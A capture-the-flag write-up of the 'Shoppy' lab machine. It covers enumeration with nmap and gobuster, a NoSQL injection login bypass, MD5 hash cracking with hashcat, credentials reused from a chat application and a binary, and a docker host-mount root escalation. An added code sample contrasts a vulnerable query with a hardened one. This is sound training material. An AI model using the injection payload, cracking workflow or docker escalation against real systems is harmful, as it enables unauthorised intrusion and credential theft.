As a first step, the IP address of the target was added to the file /etc/hosts, mapped to the hostname shoppy.htb.
Enumeration
Nmap
The Nmap scan shows that ports 22 (SSH), 80 (HTTP), and 9093 (Copycat) are open on the target.
nmap -sVC -Pn -T4 -p- shoppy.htb
HTTP
The page shoppy.htb has a timer, no clickable links, and no interesting content.
Gobuster
A directory search was performed with Gobuster with the command:
gobuster dir -u http://shoppy.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Gobuster found an available directory: /login.
Foothold
shoppy.htb/login has an admin login page.
Tested whether the login field is vulnerable to NoSQL injection by entering the username admin'||'1=1 (the password can be anything).
Logged in successfully. The admin page shows the product listing and a clickable link at the top right: "Search for users".
Entered the same payload in the user search field: admin'||'1=1
A link appeared on the page: "Download export".
Clicked on the link "Download export", which opened a new page showing the password hashes of the users admin and josh.
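The login bypass above works because the username is pasted into a query expression instead of being passed as a value. The following is an added illustration, not the Shoppy application's code: a simulated MongoDB $where lookup built by string concatenation next to a hardened lookup that treats the username strictly as data. The user store and password hashes are constructed placeholders, and the $where evaluation is simulated with Function() rather than a live database.

```javascript
// Constructed sample user store (hashes are placeholders, not real values).
const users = [
  { username: 'admin', passwordHash: 'PLACEHOLDER_HASH_1' },
  { username: 'josh',  passwordHash: 'PLACEHOLDER_HASH_2' },
];

// Vulnerable pattern: the username becomes part of a JavaScript expression
// that MongoDB's $where operator would evaluate against every document.
// Simulated here with Function() to show what the database would compute.
function findUsersVulnerable(username) {
  const whereExpr = `this.username == '${username}'`;
  const predicate = new Function(`return (${whereExpr});`);
  return users.filter((doc) => predicate.call(doc));
}

// Hardened pattern: the username is compared as a value, never evaluated,
// and its type and character set are enforced before the query is built.
// Rejecting non-strings also blocks operator objects such as {"$ne": null}.
function findUsersSafe(username) {
  if (typeof username !== 'string' || !/^[A-Za-z0-9_.-]{1,32}$/.test(username)) {
    return [];   // not a plain account name: refuse instead of querying
  }
  return users.filter((doc) => doc.username === username);
}

// Sample run: the concatenated expression matches every document because
// 'admin' || '1=1' is truthy for any username; the hardened lookup matches none.
console.log(findUsersVulnerable("admin'||'1=1").map((u) => u.username)); // [ 'admin', 'josh' ]
console.log(findUsersSafe("admin'||'1=1").map((u) => u.username));       // []
console.log(findUsersSafe('admin').map((u) => u.username));              // [ 'admin' ]
```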
Hashcat
Copied user josh's password hash to the file hash.txt. The hash was produced with the unsalted MD5 hashing algorithm (Hashcat mode 0). Next, we crack the password using Hashcat.
Started Hashcat with the command:
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Hashcat cracked user josh’s password: remembermethisway
Admin's password hash could not be cracked with the rockyou wordlist.
Gobuster
A virtual host (subdomain) search for shoppy.htb was performed with Gobuster with the command:
gobuster vhost -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u shoppy.htb
Gobuster found the subdomain: mattermost.shoppy.htb.
Added mattermost.shoppy.htb to the file /etc/hosts, mapped to the target IP address.
There is a login page at mattermost.shoppy.htb.
Successfully logged in as user josh with password: remembermethisway
The page is an instant messaging application with four different chat channels.
In the chat channel Deploy Machine, there is a message from jaeger that contains the username jaeger and the password: Sh0ppyBest@pp!
The discussion also mentions that Docker is used on the deploy machine.
SSH
Since port 22 is open on the target, an SSH connection was made successfully as user jaeger with the password: Sh0ppyBest@pp!
ssh jaeger@shoppy.htb
The user flag was found in the directory: /home/jaeger
Privilege Escalation
Checked with the command sudo -l which commands the user jaeger can run with sudo. The output shows that /home/deploy/password-manager can be executed as the user deploy.
In the directory /home/deploy, we can see an executable program: password-manager.
cd /home/deploy/
Viewed the contents of the file password-manager. It contains the interesting strings "Please enter your master password:", "Sample" and "Access granted!", which suggests that the master password is stored in plaintext inside the binary.
cat password-manager
Executed the file password-manager with the command:
sudo -u deploy /home/deploy/password-manager
Entered the password: Sample. The program then printed the username deploy and the password: Deploying@app!
Successfully changed to user deploy.
su deploy
Because the Deploy Machine discussion showed that Docker is in use on the target, changed to the root user by mounting the host filesystem into a container with the command:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
The root flag was found in the directory: /root.